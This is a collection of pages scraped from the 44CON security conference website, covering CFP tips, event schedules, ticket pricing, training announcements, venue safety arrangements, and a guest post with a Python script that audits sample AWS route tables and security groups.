We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

If you want to maximise your chances of speaking at 44CON, submit a workshop.

Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that your main talk is about the theory, and make the workshop a play-along walkthrough of how to do it in practice.

Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

Tell us where else your talk has been submitted

44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

If you’re doing your reveal in Vegas, focus on your process at 44CON.

Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

Show us your other talks

A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

Show us your other talks, even if you're a rockstar.
Showing us your other talks helps us fit you in.

This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

Submit your talks early in the process

Most of the panel vote in several stages. Almost everyone votes on the first submissions coming in, and voting slowly dribbles off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

Remember It’s A Two-Way Street

We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

Coping with rejection

Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
If your talk was rejected, it’s not an indictment of you or your talk.

To help you deal with the sting of rejection, remember this:

  1. Your talk not being accepted at 44CON does not mean we thought it was bad.
  2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
  3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

#####EOF##### 44CONnect March Week – What to expect – 44CON

44CONnect March Week – What to expect

We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

Monday 11th March – Training

Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

Tuesday 12th March – Training

Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

Wednesday 13th March – 44CONnect

If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

10:00 – Rory McCune – Container Security
11:00 – Owen Shearing & Will Hunt – Exploiting in.security
12:00 – Lightning talk round for attendees
12:30 – Lunch (included for training attendees only)
14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
15:00 – Dave Ryan – Reporting is dead. Long live reporting.

From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

Thursday 14th March – CRESTCon

We’re really excited about CRESTCon. 5 lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

#####EOF##### videos – 44CON

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

#####EOF##### 44CON 2019 – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### Training – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? The time spent on the labs would then be used to learn about cloud security and DevSecOps, not debugging software installation issues.

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

Network Forensics: A blog post by Erik Hjelmvik

I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past 10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

You can find more details about the training here.

Tickets for 44CON 2016 are on sale

44CON 2016 tickets are now on sale in our shop. Go and get yours now!

We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto. Go check them out and book your place early to avoid disappointment, as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre. You can expect a jam-packed few days of awesome talks, food and of course alcohol.

Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

Dawid Czagan’s training course is still going ahead

Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

Do check it out!

Training course at 44CON Cyber Security 2016

Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

Do check it out!

#####EOF##### Building an AWS and Azure security training platform – 44CON

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? The time spent on the labs would then be used to learn about cloud security and DevSecOps, not debugging software installation issues.

When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? The time spent on the labs would then be used to learn about cloud security and DevSecOps, not debugging software installation issues.

So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

AWS Directory Services has several options, the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

The design includes:
• Virtual Private Cloud (VPC) with private address space
• private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
• public DMZ subnets for outbound access to the Internet using NAT Gateways
• Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
• Security group on the admin server only allowing inbound remote desktop access from a single IP address.

If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.
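Two of the controls in the design list (private subnets with no route to the Internet, and remote desktop to the admin server from a single IP address) can be checked automatically after each build. The Python below is an added example, not code from the original post; it runs over constructed data shaped like the EC2 DescribeRouteTables and DescribeSecurityGroups responses. It assumes "no route to the Internet" means no route through an internet gateway (routes through a NAT Gateway are allowed), and every ID and the 203.0.113.10 address are made up for illustration.

```python
import ipaddress

RDP_PORT = 3389


def route_table_for(subnet_id, route_tables):
    """Return the route table in effect for a subnet.

    A subnet with no explicit association silently uses the VPC's main
    route table, so the fallback matters for the 'private' guarantee.
    """
    main = None
    for table in route_tables:
        for assoc in table.get("Associations", []):
            if assoc.get("SubnetId") == subnet_id:
                return table
            if assoc.get("Main"):
                main = table
    return main


def private_subnet_findings(private_subnet_ids, route_tables):
    """Flag private subnets whose effective route table targets an internet gateway."""
    findings = []
    for subnet_id in private_subnet_ids:
        table = route_table_for(subnet_id, route_tables)
        if table is None:
            findings.append(f"{subnet_id}: no route table found")
            continue
        for route in table.get("Routes", []):
            gateway = route.get("GatewayId", "")
            if gateway.startswith("igw-"):
                dest = route.get("DestinationCidrBlock")
                findings.append(
                    f"{subnet_id}: route {dest} via {gateway} in {table['RouteTableId']}"
                )
    return findings


def admin_sg_findings(group, allowed_ip):
    """Flag any inbound rule that is not TCP/3389 from exactly allowed_ip/32."""
    findings = []
    gid = group.get("GroupId", "?")
    for perm in group.get("IpPermissions", []):
        proto = perm.get("IpProtocol")
        ports = (perm.get("FromPort"), perm.get("ToPort"))
        if proto != "tcp" or ports != (RDP_PORT, RDP_PORT):
            findings.append(f"{gid}: rule is not TCP/{RDP_PORT} only ({proto}, {ports})")
        # Any non-IPv4 source type widens access beyond a single address.
        for key in ("Ipv6Ranges", "UserIdGroupPairs", "PrefixListIds"):
            if perm.get(key):
                findings.append(f"{gid}: unexpected source type {key}")
        for rng in perm.get("IpRanges", []):
            net = ipaddress.ip_network(rng["CidrIp"], strict=False)
            if net.prefixlen != 32 or str(net.network_address) != allowed_ip:
                findings.append(f"{gid}: source {rng['CidrIp']} is not {allowed_ip}/32")
    return findings


# --- Constructed sample inventory (not taken from a real account) ---
LOCAL = {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local"}
ROUTE_TABLES = [
    {"RouteTableId": "rtb-main", "Associations": [{"Main": True}],
     "Routes": [LOCAL, {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0example"}]},
    {"RouteTableId": "rtb-private", "Associations": [{"SubnetId": "subnet-user-a"}],
     "Routes": [LOCAL, {"DestinationCidrBlock": "0.0.0.0/0", "NatGatewayId": "nat-0example"}]},
    {"RouteTableId": "rtb-dmz", "Associations": [{"SubnetId": "subnet-dmz-a"}],
     "Routes": [LOCAL, {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0example"}]},
]
# subnet-user-b has no explicit association, so it inherits rtb-main.
PRIVATE_SUBNETS = ["subnet-user-a", "subnet-user-b"]

TRAINER_IP = "203.0.113.10"  # hypothetical single admin address
ADMIN_SG_GOOD = {"GroupId": "sg-admin-good", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
     "IpRanges": [{"CidrIp": "203.0.113.10/32"}]},
]}
ADMIN_SG_BAD = {"GroupId": "sg-admin-bad", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
     "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
     "IpRanges": [{"CidrIp": "203.0.113.10/32"}]},
]}

if __name__ == "__main__":
    for line in private_subnet_findings(PRIVATE_SUBNETS, ROUTE_TABLES):
        print("ROUTE", line)
    for sg in (ADMIN_SG_GOOD, ADMIN_SG_BAD):
        for line in admin_sg_findings(sg, TRAINER_IP):
            print("SG", line)
```

The second private subnet in the sample has no explicit route table association, so it falls back to the main table and picks up its internet gateway route, which is the kind of drift this check is meant to catch.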

The next step is to set up a new AWS account for the training platform. I’ll cover that in the next Blog post.

Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.


#####EOF##### 44CON – 44CON

Building A Permanent Community At 44CON

44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

 

 

We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

What To Expect On Thursday Night

44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

  • Best billed idea
  • Most lame duck pitch
  • Most quackers concept

Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

On Hotel Accommodation And Safety

First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

+44 (0)7955 376 729

Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

To that end, we’ve done two things:

  1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
  2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

“I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

Once again, that emergency crew number is:

+44 (0)7955 376 729

If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

  1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
  2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
  3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
  4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
  5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

 

#####EOF##### Hacking 44CON’s Pricing Model (5 Different Ways) – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

Obligatory hacking photo

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

Understanding Our Pricing

Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

  • Early Bird: £299
  • Standard Ticket: £349
  • On the door: £399

You can buy a standard ticket here, but read on for our hacks.

In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

Hack 1: Exploit Discounts

We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

Hack 2: Apply for Assistance

Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June, but it’s going to come down to this year’s sponsors, such as the awesome wire security.

The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

Hack 3: Apply to Join the Crew

The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

Hack 4: Split a ticket

We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

Hack 5: Ask!

If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.

#####EOF##### First Videos From 44CON 2018 Up – 44CON

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

